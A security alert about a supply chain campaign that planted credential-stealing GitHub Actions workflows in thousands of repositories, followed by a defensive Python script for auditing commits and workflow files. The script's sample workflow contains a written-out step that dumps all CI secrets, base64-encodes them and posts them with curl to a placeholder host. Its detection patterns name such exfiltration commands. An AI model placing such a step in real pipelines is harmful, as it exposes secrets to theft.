CRITICAL ⚡ MUST-KNOW
Megalodon Supply Chain Attack Infects 5,500+ GitHub Repositories
The Megalodon supply chain campaign compromised 5,500+ GitHub repositories by pushing commits disguised as routine automated changes that injected malicious GitHub Actions workflows. The injected payloads were designed to harvest credentials, CI secrets, API keys, and tokens from any pipeline run triggered after the poisoned commit landed, so every secret available to a workflow in an affected repository should be treated as exposed from that point on.
The commits passed as the output of legitimate automation, which kept them from drawing immediate suspicion. Organizations should audit recent automated commits in their repos, paying particular attention to any that touched files under .github/workflows/, and rotate any secrets that a workflow run could have read during the affected window.
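As an added example (not code from the original report or from any affected project), the following Python script shows one way to do that audit offline: it parses `git log --format='%H|%an|%ae|%s' --name-only` output, flags commits that touch `.github/workflows/` and come from automation-looking authors, and scans a workflow body for step patterns that commonly appear in secret-harvesting jobs. The sample log, the sample workflow, the `example.invalid` host and every heuristic pattern are constructed for this example; they are not indicators published for this campaign.

```python
"""Triage recent commits and workflow files for injected secret-harvesting steps.

Added example, not from the original page. Input is the text of
`git log --format='%H|%an|%ae|%s' --name-only`; the samples below are constructed.
"""
import re
from dataclasses import dataclass, field

WORKFLOW_DIR = ".github/workflows/"

# Authors that look like automation. Assumed heuristic: legitimate bots such as
# Dependabot or Renovate match too, so a hit means "review first", not "malicious".
BOT_AUTHOR = re.compile(r"\[bot\]|bot@|noreply|automation", re.IGNORECASE)

# Constructed sample of `git log --format='%H|%an|%ae|%s' --name-only` output.
SAMPLE_LOG = """\
9f1c2d3e4a5b6c7d8e9f0a1b2c3d4e5f60718293|Alice Dev|alice@example.invalid|Fix flaky test

src/app_test.py
0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d|ci-sync[bot]|ci-sync@noreply.example.invalid|chore: sync workflow config

.github/workflows/ci.yml
1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e|Bob Dev|bob@example.invalid|Add lint job

.github/workflows/lint.yml
"""

# Constructed workflow resembling a poisoned CI file: the last step serializes the
# whole secrets context and posts it to an external host.
SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - name: warm cache
        env:
          BLOB: ${{ toJSON(secrets) }}
        run: echo "$BLOB" | base64 -w0 | curl -s -X POST --data @- https://cache.example.invalid/u
"""


@dataclass
class Commit:
    sha: str
    author: str
    email: str
    subject: str
    files: list = field(default_factory=list)


COMMIT_LINE = re.compile(r"^([0-9a-f]{7,40})\|([^|]*)\|([^|]*)\|(.*)$")


def parse_git_log(text):
    """Split the log into Commit records; non-empty lines after a header are paths."""
    commits, current = [], None
    for line in text.splitlines():
        m = COMMIT_LINE.match(line)
        if m:
            current = Commit(*m.groups())
            commits.append(current)
        elif line.strip() and current is not None:
            current.files.append(line.strip())
    return commits


def touches_workflows(commit):
    return any(f.startswith(WORKFLOW_DIR) for f in commit.files)


def suspicious_commits(commits):
    """Workflow-touching commits from automation-looking authors, for manual review."""
    return [c for c in commits
            if touches_workflows(c) and BOT_AUTHOR.search(f"{c.author} <{c.email}>")]


# Line-level patterns seen in secret-exfiltrating steps. Assumed heuristics for this
# example; tune them to the repository's own conventions before relying on them.
EXFIL_PATTERNS = [
    (re.compile(r"toJSON\(\s*secrets\s*\)"), "serializes the whole secrets context"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "pipes a remote download into a shell"),
    (re.compile(r"\b(curl|wget)\b.*(--data|-d\b|-T\b|--upload-file)"), "uploads data to a remote host"),
    (re.compile(r"\bbase64\b"), "base64 encodes or decodes inline"),
    (re.compile(r"run:.*\$\{\{\s*secrets\."), "interpolates a secret directly into a shell step"),
]


def scan_workflow(yaml_text):
    """Return (line_number, reason) pairs for every suspicious line in a workflow."""
    findings = []
    for no, line in enumerate(yaml_text.splitlines(), 1):
        for pat, why in EXFIL_PATTERNS:
            if pat.search(line):
                findings.append((no, why))
    return findings


if __name__ == "__main__":
    for c in suspicious_commits(parse_git_log(SAMPLE_LOG)):
        print(f"REVIEW {c.sha[:12]} {c.author} <{c.email}>: {c.subject} -> {c.files}")
    for no, why in scan_workflow(SAMPLE_WORKFLOW):
        print(f"  line {no}: {why}")
```

In a real audit, feed the script the log for the suspected window (for example `git log --since=<date> --format='%H|%an|%ae|%s' --name-only -- .github/workflows/`) and run `scan_workflow` over each workflow file at every flagged commit, not just at HEAD, since an injected step may already have been reverted after it ran.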